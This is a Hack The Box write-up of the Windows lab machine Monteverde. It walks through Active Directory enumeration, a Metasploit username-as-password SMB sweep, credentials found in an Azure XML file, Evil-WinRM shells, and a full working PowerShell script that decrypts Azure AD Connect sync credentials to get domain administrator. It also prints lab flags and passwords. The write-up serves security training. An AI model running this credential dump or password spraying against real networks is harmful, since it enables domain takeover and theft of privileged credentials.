As the second new box in 2020, Monteverde came into play. A Medium Windows box good for 30 points for your next status on Hack The Box. Personally, I like the Windows machines better than Linux, but that’s purely because I’m more concerned with the Microsoft ecosystem. Enough general shizzle, time to discover Monteverde.


An Nmap scan a day, keeps the doctor away. First let’s see what is available on this Windows box. LDAP, SMB and WINRM are available, chances are that a large part of the enumeration can be done with them.
nmap -sC -sV -T5 -oA monteverde 10.10.10.172 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT Nmap scan report for 10.10.10.172 Host is up (0.061s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3FE556%P=x86_64-pc-linux-gnu%r(DNSVe SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x SF:04bind\0\0\x10\0\x03"); Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 9m27s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-09T11:08:14 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds
By means of enum4linux you can quickly see whether accounts can be found, what the domain is and any group memberships.
enum4linux 10.10.10.172 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.172 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =========================================== | Getting domain SID for 10.10.10.172 | =========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: MEGABANK Domain Sid: S-1-5-21-391775091-850290835-3566037492 [+] Host is part of a domain (not a workgroup) ============================= | Users on 10.10.10.172 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null) index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null) index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null) index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null) index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null) index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null) index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null) [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] [+] Getting domain group memberships: Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator group:[Developers] rid:[0xa34]
The output returns a number of usernames but no further hints to passwords. I create a text file with the usernames to quickly see whether accounts can be logged in by means of the SMB_Login module in Metasploit.
msfconsole ___ ____ ,-"" `. < HONK > ,' _ e )`-._ / ---- / ,' `-._<.===-' / / / ; _ / ; (`._ _.-"" ""--..__,' | <_ `-"" \ <`- : (__ <__. ; `-. '-.__. _.' / \ `-.__,-' _,' `._ , /__,-' ""._\__,'< <____ | | `----.`. | | \ `. ; |___ \-`` \ --< `.`.< `-' =[ metasploit v5.0.72-dev ] + -- --=[ 1963 exploits - 1095 auxiliary - 336 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion
First, I try to use the USER_AS_PASS option . This option ensures that the username is used as password for all users in my user list. A quick way to see if a lazy administrator has been working.
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172 RHOSTS => 10.10.10.172 msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK SMBDomain => MEGABANK msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true USER_AS_PASS => true msf5 auxiliary(scanner/smb/smb_login) > run
Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply: SABatchJobs.
[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce [-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\dgalanos:dgalanos', [-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\Guest:Guest', [-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\mhope:mhope', [-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\roleary:roleary', [+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK\SABatchJobs:SABatchJobs' [*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
[0x3] Path to User flag
The account cannot connect via Windows Remote Management. First, browse through SMB based on the SABatchJobs password found.
smbclient -U SABatchJobs -L 10.10.10.172 Enter WORKGROUP\SABatchJobs's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin azure_uploads Disk C$ Disk Default share E$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share users$ Disk
The users $ share contains a number of directories that I cannot access with these credentials. The only file visible is azure.xml .
smbclient \\\\monteverde\\users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir . D 0 Fri Jan 3 13:12:48 2020 .. D 0 Fri Jan 3 13:12:48 2020 dgalanos D 0 Fri Jan 3 13:12:30 2020 mhope D 0 Fri Jan 3 13:41:18 2020 roleary D 0 Fri Jan 3 13:10:30 2020 smorgan D 0 Fri Jan 3 13:10:24 2020 \dgalanos . D 0 Fri Jan 3 13:12:30 2020 .. D 0 Fri Jan 3 13:12:30 2020 \mhope . D 0 Fri Jan 3 13:41:18 2020 .. D 0 Fri Jan 3 13:41:18 2020 azure.xml AR 1212 Fri Jan 3 13:40:23 2020 \roleary . D 0 Fri Jan 3 13:10:30 2020 .. D 0 Fri Jan 3 13:10:30 2020 \smorgan . D 0 Fri Jan 3 13:10:24 2020 .. D 0 Fri Jan 3 13:10:24 2020 524031 blocks of size 4096. 518419 blocks available
A config file for Azure, but otherwise I don’t expect to need much of this in terms of code. What is interesting is the Password. Since this file is in mhope ‘s directory , this may be his password.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3r$</S> </Props> </Obj> </Objs>
After the first user I now have a set of credentials for mhope . I expect to now also have the user flag.
evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$" Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\mhope\Documents> *Evil-WinRM* PS C:\Users\mhope\Desktop> dir Directory: C:\Users\mhope\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/3/2020 5:48 AM 32 user.txt
User flag is in. Now continue to search for an option to find root.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt 4961976bd7d8f4eeb2ce3705e2f212f2
[0x4] Path too Root flag
The machine is fairly bare and there is little of interest to browse through. In C: \ Program Files you can see that this machine is equipped with Azure AD Connect, a piece of tooling for synchronizing your on-premise Active Directory to Azure Active Directory. I do not expect this on an HTB box without it having a purpose. Will this be root?
*Evil-WinRM* PS C:\Program Files> dir Directory: C:\Program Files Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/2/2020 9:36 PM Common Files d----- 1/2/2020 2:46 PM internet explorer d----- 1/2/2020 2:38 PM Microsoft Analysis Services d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync d----- 1/2/2020 2:31 PM Microsoft SQL Server d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
After some searching on Google I find an article about Azure AD Connect for Red Teamers. The article explains how to use a Powershell script to dump the username and password of the user with which Azure AD Sync is running. The script is on the website, however, it does not work directly on this box.
After some errors about not being able to connect, I made some adjustments in the script. On the machine I found the folder C: \ Program Files \ Microsoft SQL Server \ mssql14.mssqlserver which explains why it is not working. The connection string in the original script does not work with this version of MSSQL, because MSSQL14 = Microsoft SQL Server 2017.
I have adapted the line below so that the string works with the version of MSSQL that is installed on Monteverde.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
See here, a working script for dumping Azure AD Sync credentials. As you can see at $ client, the string is different from the original from XPN InfoSec’s blog.
# Azure-ADConnect-CredentialExtract.ps1 # Original author: Azure AD Connect for Red Teamers (XPN Adam Chester) # Changes: adjusted $client string for MSSQL 2017. # $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Initial Catalog=ADSync;Trusted_Connection =yes;" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll" $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}} Write-Host ("[+] Domain: " + $domain.Domain) Write-Host ("[+] Username: " + $username.Username) Write-Host ("[+]Password: " + $password.Password)
I modified and saved the script locally on my laptop. Via upload within the WIN-RM shell you can easily upload it to the remote box.
*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1 Info: Uploading Azure-ADConnect-CredentialExtract.ps1 to C:\users\mhope\Videos\ad2.ps1 Data: 2288 bytes of 2288 bytes copied Info: Upload successful!
And there you have it! In this case, the Administrator account was used for Azure AD Sync.
*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1 [+] Domain: MEGABANK.LOCAL [+] Username: administrator [+]Password: d0m@in4dminyeah!
Through Evil-WinRM I can log in with the newly acquired Administrator credentials.
evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!" Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!
cat c:\Users\Administrator\Desktop\root.txt 12909612d25c8dcf6e5a07d1a804a0bc